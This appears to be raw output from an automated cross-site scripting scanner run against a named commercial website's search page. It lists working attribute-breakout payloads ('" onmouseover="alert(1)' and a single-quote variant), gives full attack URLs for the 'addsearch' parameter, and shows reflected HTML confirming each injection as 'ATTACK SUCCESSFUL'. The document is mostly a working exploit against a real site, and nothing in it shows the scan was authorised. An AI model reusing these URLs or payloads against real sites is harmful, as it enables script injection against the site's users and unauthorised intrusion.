https://www.redrivercatalog.com

GET Params:[1]
['addsearch']
_______________________________________________________________________________________________________
https://www.redrivercatalog.com/search.html?addsearch=(uvw"xyz'yxz</zxy

----------------------------------------------------------------------------------
Attribute Context: [3]
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="(uvw"xyz'yxz</zxy">
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="(uvw"xyz'yxz</zxy">
<input class="form-control" style="display:inline-block; width:auto" type="text" name="addsearch" id="Search" class="textfield" value="&#40;uvw&quot;xyz'yxz&lt;/zxy"/>

----------------------------------------------------------------------------------
HTML Context: [1]
<span class="text-monospace">&#40;uvw&quot;xyz'yxz&lt;/zxy</span>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [1]
<a class="btn btn-outline-primary" href="/red-river-product-finder.html?search=(uvw"xyz'yxz</zxy">

----------------------------------------------------------------------------------


ENCODING     Presence	"	'	<	( 
ATTR:		True	False	False	False	False

Attack Payloads for ATTR
['" onmouseover="alert(1)', "' onmouseover='alert(1)"]

ATTR Attack Url: https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)

=> ATTACK SUCCESSFUL with Payload: " onmouseover="alert(1)
Detection of Payload: 
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)">
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)">

ATTR Attack Url: https://www.redrivercatalog.com/search.html?addsearch=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="' onmouseover='alert(1)">
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="' onmouseover='alert(1)">
ENCODING     Presence	"	'	<	( 
ATTR:		True	False	False	False	False

Attack Payloads for ATTR
['" onmouseover="alert(1)', "' onmouseover='alert(1)"]

ATTR Attack Url: https://www.redrivercatalog.com/search.html?addsearch=" onmouseover="alert(1)

=> ATTACK SUCCESSFUL with Payload: " onmouseover="alert(1)
Detection of Payload: 
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)">
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="" onmouseover="alert(1)">

ATTR Attack Url: https://www.redrivercatalog.com/search.html?addsearch=' onmouseover='alert(1)

=> ATTACK SUCCESSFUL with Payload: ' onmouseover='alert(1)
Detection of Payload: 
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="' onmouseover='alert(1)">
<input type="search" class="form-control" placeholder="Search" aria-label="search" aria-describedby="search" name="addsearch" value="' onmouseover='alert(1)">
ENCODING     Presence	"	'	<	( 
ATTR:		True	True	False	True	True

Attack Payloads for ATTR
[]
ENCODING     Presence	"	'	<	( 
HTML:		True	True	False	True	True

Attack Payloads for HTML
[]
ENCODING     Presence	"	'	<	( 
URL:		True	True	True	False	False

Attack Payloads for URL
[]
